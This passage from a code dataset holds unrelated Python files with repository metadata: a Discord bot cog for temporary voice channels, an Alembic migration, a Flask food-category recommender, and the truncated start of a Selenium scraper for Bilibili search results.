"github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 38, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "31093097958", "text": "from __future__ import annotations\nfrom typing import Optional\n\nimport discord\nimport re\nfrom discord import app_commands, utils\nfrom discord.ext import commands, tasks\nfrom collections import defaultdict\nimport json\nimport asyncio\nfrom bot.common import GuildBot, extension_setup\nfrom pathlib import Path\n\n\nclass SquadVoice(commands.Cog):\n data_directory = \"data/squad_voice/\"\n channel_creators_filename = \"channel-creators.json\"\n temporary_channels_filename = \"temporary-channels.json\"\n\n def __init__(self, bot: GuildBot):\n self.bot = bot\n self.channel_creators = {}\n self.all_temporary_channels = {}\n\n self.channel_creators_path = Path(self.data_directory, self.channel_creators_filename).resolve()\n self.temporary_channels_path = Path(self.data_directory, self.temporary_channels_filename).resolve()\n\n self.voice_creator_commands: Optional[app_commands.Group] = None\n self.created_channel_commands: Optional[app_commands.Group] = None\n\n async def cog_load(self) -> None:\n self.create_command_groups()\n self.register_voice_creator_commands_to_group()\n self.register_created_channel_commands_to_group()\n\n Path(self.data_directory).mkdir(exist_ok=True)\n self.channel_creators_path.touch(exist_ok=True)\n self.temporary_channels_path.touch(exist_ok=True)\n\n self.bot.loop.create_task(self.load_from_json())\n\n def cog_unload(self) -> None:\n if self.channel_creators:\n self.dump_channel_creators()\n if self.all_temporary_channels:\n 
self.dump_temporary_channels()\n\n def dump_channel_creators(self):\n data = [{\"channel_id\": channel_creator.channel.id,\n \"create_name\": channel_creator.create_name,\n \"create_category_id\": channel_creator.create_category.id if channel_creator.create_category else None,\n \"create_user_limit\": channel_creator.create_user_limit}\n for channel_creator in self.channel_creators.values()]\n with open(self.channel_creators_path, \"w\") as writefile:\n json.dump(data, writefile, indent=2)\n\n def dump_temporary_channels(self):\n data = [{\"channel_id\": temporary_channel.channel.id,\n \"index\": temporary_channel.index,\n \"creator\": temporary_channel.creator.channel.id}\n for temporary_channel in self.all_temporary_channels.values()]\n with open(self.temporary_channels_path, \"w\") as writefile:\n json.dump(data, writefile, indent=2)\n\n async def load_channel_creators_from_json(self):\n await self.bot.wait_until_ready()\n\n with open(self.channel_creators_path, \"r\") as readfile:\n try:\n channel_creators_data = json.load(readfile)\n except json.decoder.JSONDecodeError:\n return\n\n self.channel_creators = {}\n\n for channel_creator_data in channel_creators_data:\n try:\n channel_creator_data[\"channel\"] = await self.bot.fetch_channel(channel_creator_data[\"channel_id\"])\n except discord.NotFound:\n continue\n\n del channel_creator_data[\"channel_id\"]\n if channel_creator_data[\"create_category_id\"]:\n try:\n channel_creator_data[\"create_category\"] = await self.bot.fetch_channel(channel_creator_data[\"create_category_id\"])\n except discord.NotFound:\n channel_creator_data[\"create_category\"] = channel_creator_data[\"channel\"].category\n else:\n channel_creator_data[\"create_category\"] = None\n del channel_creator_data[\"create_category_id\"]\n channel_creator = ChannelCreator(self, **channel_creator_data)\n self.channel_creators[channel_creator.channel.id] = channel_creator\n\n async def load_temporary_channels_from_json(self):\n with open(self.temporary_channels_path, \"r\") as readfile:\n try:\n temporary_channels_data = json.load(readfile)\n except json.decoder.JSONDecodeError:\n return\n\n self.all_temporary_channels = {}\n\n for temporary_channel_data in temporary_channels_data:\n try:\n channel: discord.VoiceChannel = await self.bot.fetch_channel(temporary_channel_data[\"channel_id\"])\n except discord.NotFound:\n continue\n\n if len(channel.members) == 0:\n await channel.delete()\n elif channel and temporary_channel_data[\"creator\"] in self.channel_creators.keys():\n channel_creator = self.channel_creators[temporary_channel_data[\"creator\"]]\n temporary_channel = TemporaryChannel(self, channel_creator,\n temporary_channel_data[\"index\"], channel_creator.create_category,\n channel_creator.create_name, channel_creator.create_user_limit,\n channel)\n await temporary_channel.ready.wait()\n channel_creator.register_temporary_channel(temporary_channel, dump=False)\n\n async def load_from_json(self):\n await self.load_channel_creators_from_json()\n await self.load_temporary_channels_from_json()\n\n self.dump_temporary_channels()\n self.dump_channel_creators()\n\n async def get_temporary_channel(self, interaction: discord.Interaction) -> Optional[TemporaryChannel]:\n voice_state = interaction.user.voice\n if not voice_state:\n await interaction.response.send_message(\"You are not in a voice channel.\", ephemeral=True)\n return None\n\n in_channel = voice_state.channel\n try:\n return self.all_temporary_channels[in_channel.id]\n except KeyError:\n await 
interaction.response.send_message(\"You are not in a temporary voice channel.\", ephemeral=True)\n return None\n\n async def do_limit_command(self, interaction: discord.Interaction, size, message):\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n if size == 0:\n size = None\n elif size < 0:\n await interaction.response.send_message(\"Cannot set negative channel size.\", ephemeral=True)\n return\n\n await temporary_channel.edit(user_limit=size)\n\n await interaction.response.send_message(message % (temporary_channel.channel.mention, size or \"unlimited\"))\n\n async def check_joined_creator_channel(self, user, channel_moved_to):\n if channel_moved_to.channel is None:\n return\n\n try:\n joined_channel_creator = self.channel_creators[channel_moved_to.channel.id]\n except KeyError:\n return\n\n new_temporary_channel = await joined_channel_creator.create_temporary_channel()\n await new_temporary_channel.ready.wait()\n await user.move_to(new_temporary_channel.channel)\n\n async def check_left_temporary_channel(self, channel_moved_from):\n if channel_moved_from.channel is None:\n return\n\n try:\n left_temp_channel = self.all_temporary_channels[channel_moved_from.channel.id]\n except KeyError:\n return\n\n voice_states = channel_moved_from.channel.voice_states\n if len(voice_states) == 0:\n await left_temp_channel.delete()\n\n @commands.Cog.listener()\n async def on_voice_state_update(self, user, before, after):\n if before.channel == after.channel:\n return\n await self.check_joined_creator_channel(user, after)\n await self.check_left_temporary_channel(before)\n\n def create_command_groups(self):\n self.voice_creator_commands = app_commands.Group(name=\"voicecreator\",\n description=\"Incremental Channel Creator Commands.\",\n guild_only=True,\n default_permissions=discord.Permissions(manage_channels=True))\n self.created_channel_commands = app_commands.Group(name=\"voice\",\n description=\"Created Channel Commands.\",\n guild_only=True)\n\n self.__cog_app_commands__.append(self.voice_creator_commands)\n self.__cog_app_commands__.append(self.created_channel_commands)\n\n def register_voice_creator_commands_to_group(self):\n @self.voice_creator_commands.command(name=\"create\")\n @app_commands.rename(category=\"creator_category\",\n create_name=\"created_name\",\n create_category=\"created_category\")\n async def _create_channel_creator(interaction: discord.Interaction,\n name: str,\n category: Optional[discord.CategoryChannel] = None,\n create_name: Optional[str] = None,\n create_category: Optional[discord.CategoryChannel] = None,\n user_limit: Optional[int] = None):\n \"\"\"Create an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n name : str\n Name of channel creator.\n category : Optional[discord.CategoryChannel]\n Category to place creator into.\n create_name : Optional[str]\n Name of created temporary channels.\n create_category : Optional[discord.CategoryChannel]\n Category of created temporary channels.\n user_limit : Optional[int]\n User limit of created temporary channels.\n \"\"\"\n new_channel_creator_channel = await interaction.guild.create_voice_channel(name=name, category=category)\n self.channel_creators[new_channel_creator_channel.id] = ChannelCreator(self,\n new_channel_creator_channel,\n create_name or name,\n create_category or category,\n user_limit)\n self.dump_channel_creators()\n await interaction.response.send_message(\n f\"Created new 
incremental channel creator {new_channel_creator_channel.mention} successfully.\")\n\n @self.voice_creator_commands.command(name=\"delete\")\n async def _delete_channel_creator(interaction: discord.Interaction,\n channel: discord.VoiceChannel):\n \"\"\"Delete an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n channel : discord.VoiceChannel\n Incremental voice channel creator to delete.\n \"\"\"\n\n if channel.id not in self.channel_creators.keys():\n await interaction.response.send_message(\n f\"{channel.mention} is not an incremental voice channel creator.\")\n return\n\n await self.channel_creators[channel.id].delete()\n await interaction.response.send_message(\n f\"Successfully deleted incremental voice channel creator with ID `{channel.id}`\")\n\n @self.voice_creator_commands.command(name=\"edit\")\n @app_commands.rename(create_name=\"created_name\",\n create_category=\"created_category\")\n async def _edit_channel_creator(interaction: discord.Interaction,\n channel: discord.VoiceChannel,\n create_name: Optional[str] = None,\n create_category: Optional[discord.CategoryChannel] = None,\n user_limit: Optional[int] = None):\n \"\"\"Edit an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n channel : discord.VoiceChannel\n Incremental voice channel creator to edit.\n create_name : Optional[str]\n Name of created temporary channels.\n create_category : Optional[discord.CategoryChannel]\n Category of created temporary channels.\n user_limit : Optional[int]\n User limit of created temporary channels.\n \"\"\"\n if channel.id not in self.channel_creators.keys():\n await interaction.response.send_message(f\"{channel.mention} is not an incremental voice channel creator.\")\n return\n\n channel_creator = self.channel_creators[channel.id]\n await channel_creator.edit(create_name, create_category, user_limit)\n await interaction.response.send_message(\n f\"Successfully edited incremental channel creator {channel_creator.channel.mention}\")\n\n def register_created_channel_commands_to_group(self):\n @self.created_channel_commands.command(name=\"resize\")\n @app_commands.checks.cooldown(2, 60)\n async def _resize(interaction: discord.Interaction,\n size: int):\n \"\"\"Resize your voice channel.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n size : int\n Number of users allowed in the channel.\n \"\"\"\n await self.do_limit_command(interaction, size, \"Successfully set %s size to `%s`\")\n\n @self.created_channel_commands.command(name=\"limit\")\n @app_commands.checks.cooldown(2, 60)\n async def _limit(interaction: discord.Interaction,\n limit: int):\n \"\"\"Apply a user limit to your voice channel. 
0 removes the limit.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n limit : int\n Number of users allowed in the channel.\n \"\"\"\n await self.do_limit_command(interaction, limit, \"Successfully limited %s to `%s`\")\n\n @self.created_channel_commands.command(name=\"unlimit\")\n @app_commands.checks.cooldown(2, 60)\n async def _unlimit(interaction: discord.Interaction):\n \"\"\"Unlimit your voice channel.\"\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n \"\"\"\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n await temporary_channel.edit(user_limit=None)\n\n await interaction.response.send_message(f\"Successfully unlimited {temporary_channel.channel.mention}\")\n\n @self.created_channel_commands.command(name=\"rename\")\n @app_commands.checks.cooldown(2, 60)\n async def _rename(interaction: discord.Interaction,\n name: str):\n \"\"\"Rename your voice channel.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n name : str\n New name of the channel.\n \"\"\"\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n if re.match(r\"#\\d+\", name.lower().removeprefix(temporary_channel.creator.create_name.lower()).strip()):\n await interaction.response.send_message(\"Please don't use misleading channel names.\", ephemeral=True)\n return\n\n await temporary_channel.edit(name=name)\n\n await interaction.response.send_message(f\"Successfully renamed {temporary_channel.channel.mention}\")\n\n\nclass ChannelCreator:\n def __init__(self, cog: SquadVoice, channel: discord.VoiceChannel, create_name: str,\n create_category: discord.CategoryChannel = None, create_user_limit: int = None):\n self.cog = cog\n self.channel = channel\n self.create_name = create_name\n self.create_category = create_category\n self.create_user_limit = create_user_limit\n self.created_channels = {}\n self.used_indexes = set()\n\n async def delete(self):\n cache = self.created_channels.copy().values()\n for created_channel in cache:\n await created_channel.delete(dump=False)\n self.cog.dump_temporary_channels()\n del cache\n\n await self.channel.delete()\n\n del self.cog.channel_creators[self.channel.id]\n self.cog.dump_channel_creators()\n\n def get_minimum_unused_index(self):\n if len(self.used_indexes) == 0:\n return 1\n minval, maxval = min(self.used_indexes), max(self.used_indexes)\n if len(self.used_indexes) < maxval - minval + 1:\n return min(set(range(minval, maxval + 1)) - self.used_indexes)\n else:\n return len(self.used_indexes) + 1\n\n async def create_temporary_channel(self):\n index = self.get_minimum_unused_index()\n temporary_channel = TemporaryChannel(self.cog, self, index, self.create_category,\n self.create_name, self.create_user_limit)\n await temporary_channel.ready.wait()\n self.register_temporary_channel(temporary_channel)\n\n return temporary_channel\n\n def register_temporary_channel(self, temporary_channel, dump=True):\n self.used_indexes.add(temporary_channel.index)\n self.created_channels[temporary_channel.channel.id] = temporary_channel\n self.cog.all_temporary_channels[temporary_channel.channel.id] = temporary_channel\n if dump:\n self.cog.dump_temporary_channels()\n\n async def edit(self, create_name: str = None, create_category: discord.CategoryChannel = None,\n create_user_limit: int = False):\n changed = False\n if create_name is not None:\n self.create_name = 
create_name\n changed = True\n\n if create_user_limit is not None:\n if create_user_limit <= 0:\n self.create_user_limit = None\n else:\n self.create_user_limit = int(create_user_limit)\n changed = True\n\n if create_category is not None:\n self.create_category = create_category\n\n changed = True\n\n if changed:\n for _, temporary_channel in sorted(self.created_channels.items()):\n await temporary_channel.edit(name=self.create_name, category=self.create_category,\n user_limit=self.create_user_limit)\n\n\nclass TemporaryChannel:\n def __init__(self, cog: SquadVoice, creator: ChannelCreator, index: int,\n category: discord.CategoryChannel, name: str, user_limit: Optional[int] = None,\n channel: discord.VoiceChannel = None):\n self.cog = cog\n self.creator = creator\n self.index = index\n self.name = name\n self.channel = channel\n self.category = category\n self.user_limit = user_limit\n self.edited_recently = defaultdict(lambda: False)\n self.ready = asyncio.Event()\n\n loop = asyncio.get_event_loop()\n loop.create_task(self.ready_up())\n\n async def ready_up(self):\n to_name = self.make_name()\n if not self.channel:\n guild = self.creator.channel.guild\n try:\n assert type(guild) is discord.Guild\n except AssertionError:\n guild = utils.get(self.cog.bot.guilds, id=guild.id)\n\n try:\n self.channel = await guild.create_voice_channel(to_name, category=self.category, user_limit=self.user_limit)\n except discord.HTTPException as error:\n if \"Category does not exist\" in str(error):\n self.creator.create_category = self.creator.channel.category\n self.category = self.creator.create_category\n self.channel = await guild.create_voice_channel(to_name, category=self.category, user_limit=self.user_limit)\n self.cog.dump_channel_creators()\n else:\n raise error\n\n self.ready.set()\n\n def make_edit_timer(self, time: int, property_name: str):\n async def _job():\n await asyncio.sleep(time)\n self.edited_recently[property_name] = False\n\n self.edited_recently[property_name] = bool(asyncio.create_task(_job()))\n\n def make_name(self):\n if self.name == self.creator.create_name:\n return f\"{self.name} #{str(self.index)}\"\n else:\n return self.name\n\n async def delete(self, dump=True):\n\n await self.channel.delete()\n\n self.creator.used_indexes.remove(self.index)\n\n del self.creator.created_channels[self.channel.id]\n del self.cog.all_temporary_channels[self.channel.id]\n if dump:\n self.cog.dump_temporary_channels()\n\n async def edit(self, index: int = None, category: discord.CategoryChannel = False, name: str = None,\n user_limit: Optional[int] or bool = False) -> None:\n\n changed = False\n if index:\n self.index = index\n changed = True\n\n if category or category is None:\n self.category = category\n changed = True\n\n if name:\n self.name = name\n changed = True\n\n if user_limit or user_limit is None:\n self.user_limit = user_limit\n changed = True\n\n if changed:\n await self.channel.edit(name=self.make_name(), category=self.category,\n user_limit=self.user_limit if self.user_limit is not None else 0)\n\n\nsetup = extension_setup(SquadVoice)\n", "repo_name": "Lordfirespeed/Centrifuge", "sub_path": "bot/cogs/squad_voice.py", "file_name": "squad_voice.py", "file_ext": "py", "file_size_in_byte": 22581, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 15, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name"}, 
{"api_name": "bot.common.GuildBot", "line_number": 20, "usage_type": "name"}, {"api_name": "bot.common", "line_number": 21, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 25, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 28, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 29, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 29, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 63, "usage_type": "call"}, {"api_name": "json.load", "line_number": 70, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 71, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 79, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 86, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 98, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 105, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 106, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 127, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 127, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 140, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 181, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 181, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 181, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 189, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 189, "usage_type": "name"}, {"api_name": "discord.Permissions", "line_number": 192, "usage_type": "call"}, {"api_name": "discord.app_commands.Group", "line_number": 193, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 193, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 205, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 207, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 207, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 209, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 209, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 210, "usage_type": "name"}, {"api_name": "discord.app_commands.rename", "line_number": 202, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 202, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 239, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 240, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 263, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 264, 
"usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 265, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 266, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 266, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 267, "usage_type": "name"}, {"api_name": "discord.app_commands.rename", "line_number": 261, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 261, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 295, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 294, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 294, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 294, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 310, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 309, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 309, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 309, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 325, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 324, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 324, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 324, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 343, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 358, "usage_type": "call"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 342, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 342, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 342, "usage_type": "name"}, {"api_name": "discord.VoiceChannel", "line_number": 368, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 369, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 415, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 442, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 442, "usage_type": "name"}, {"api_name": "discord.VoiceChannel", "line_number": 443, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 451, "usage_type": "call"}, {"api_name": "asyncio.Event", "line_number": 452, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 454, "usage_type": "call"}, {"api_name": "discord.Guild", "line_number": 462, "usage_type": "attribute"}, {"api_name": "discord.utils.get", "line_number": 464, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 464, "usage_type": "name"}, {"api_name": "discord.HTTPException", "line_number": 468, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 481, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 484, "usage_type": "call"}, {"api_name": "discord.CategoryChannel", "line_number": 503, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 504, "usage_type": "name"}, {"api_name": "bot.common.extension_setup", "line_number": 528, "usage_type": "call"}]} +{"seq_id": "15800119886", "text": "\"\"\"add tables\n\nRevision ID: d2615228dcac\nRevises: 
32505b1f2d53\nCreate Date: 2023-05-04 08:52:41.545752\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd2615228dcac'\ndown_revision = '32505b1f2d53'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('text', sa.String(length=255), nullable=False),\n sa.Column('author', sa.String(length=20), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('post_user_likes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.UUID(), nullable=True),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('post_user_likes')\n op.drop_table('post')\n # ### end Alembic commands ###\n", "repo_name": "AVyha/social_network", "sub_path": "alembic/versions/d2615228dcac_add_tables.py", "file_name": "d2615228dcac_add_tables.py", "file_ext": "py", "file_size_in_byte": 1206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.UUID", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 40, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 41, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "71127997289", "text": "from flask import Flask, render_template, request\nimport pickle\nimport pandas as pd\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef Home():\n if request.method == 
'POST':\n model = pickle.load(open('food_recommendation_model.pkl', 'rb'))\n calories = float(request.form[\"calories\"])\n carbohydrates = float(request.form['carbohydrates'])\n fats = float(request.form['fats'])\n protein = float(request.form['protein'])\n\n Measure = 0.25\n Grams = 1\n Calories = calories\n Protein = protein\n Fat = fats\n Sat_Fat = 0.102564103\n Fiber = 0.0\n Carbs = carbohydrates\n\n input_data = pd.DataFrame({\n 'Measure': [Measure],\n 'Grams': [Grams],\n 'Calories': [Calories],\n 'Protein': [Protein],\n 'Fat': [Fat],\n 'Sat.Fat': [Sat_Fat],\n 'Fiber': [Fiber],\n 'Carbs': [Carbs]\n })\n\n prediction = model.predict(input_data)\n\n food_dict = {\n 1: 'Breads, cereals, fastfood,grains (e.g., bread, rice, pasta)',\n 2: 'Meat, Poultry (e.g., chicken, beef, pork)',\n 3: 'Desserts, sweets (e.g., cookies, cakes, candies)',\n 4: 'Dairy products (e.g., milk, cheese, yogurt)',\n 5: 'Vegetables A-E (e.g., asparagus, broccoli, carrots)',\n 6: 'Vegetables R-Z (e.g., radishes, zucchini, squash)',\n 7: 'Fruits G-P (e.g., grapes, oranges, peaches)',\n 8: 'Fruits A-F (e.g., apples, bananas, cherries)',\n 9: 'Fish, Seafood (e.g., salmon, shrimp, tuna)',\n 10: 'Fats, Oils, Shortenings (e.g., butter, olive oil, lard)',\n 11: 'Vegetables F-P (e.g., fennel, lettuce, peppers)',\n 12: 'Seeds and Nuts (e.g., almonds, peanuts, sunflower seeds)',\n 13: 'Drinks,Alcohol, Beverages (e.g., water, soda, wine)',\n 14: 'Soups (e.g., chicken soup, tomato soup, vegetable soup)',\n 15: 'Fruits R-Z (e.g., raspberries, strawberries, watermelon)',\n 16: 'Jams,Jellies (e.g., strawberry jam, grape jelly, marmalade)'\n }\n\n if prediction[0] in food_dict:\n print(prediction[0])\n recommended_food_category = food_dict[prediction[0]]\n result = f\"The recommended food category is: {recommended_food_category}\"\n else:\n result = \"Sorry, we are not able to recommend a proper food category for this environment.\"\n\n # user_input = [Measure,Grams,Calories,Protein,Fat,Sat.Fat,Fiber,Carbs]\n # user_input = [0.25, 0.991, 0.665322581, 0.141630901,\n # 0.17167382, 0.153846154, 0, 0.203389831]\n\n result_html = process_user_input(result)\n\n return result_html\n return render_template('index.html')\n\n\ndef process_user_input(result):\n # Replace this with your actual data processing logic\n\n # Generate HTML for the results\n # result_html = '
<ul>'\n # for item in result:\n # result_html += f'<li>{item}</li>'\n # result_html += '</ul>
'\n\n return '<h1>'+result+'</h1>
'\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "Riya2812/NFC_CodeRunners", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "29960524565", "text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport xlwt\nimport bs4\nfrom selenium.webdriver.chrome.options import Options\n\n# 浏览器初始化\noptions = Options()\noptions.add_argument('--headless')\nbrowser=webdriver.Chrome(options=options)\nWAIT=WebDriverWait(browser,10)\nbrowser.set_window_size(1400, 900)\nbrowser.get('https://www.bilibili.com/')\n\n# 数据库初始化\n\ndef searchB(src):\n\n # 表格初始化(仅用于表格储存信息模式)\n book = xlwt.Workbook(src, style_compression=0)\n sheet = book.add_sheet(src, cell_overwrite_ok=True)\n sheet.write(0, 0, '名称')\n sheet.write(0, 1, '地址')\n sheet.write(0, 2, '描述')\n sheet.write(0, 3, '观看次数')\n sheet.write(0, 4, '弹幕数')\n sheet.write(0, 5, '发布时间')\n sheet.write(0, 6, 'Up主')\n n = 1\n\n\n def search():\n try:\n print(\"开始尝试访问b站...\")\n input = WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR, 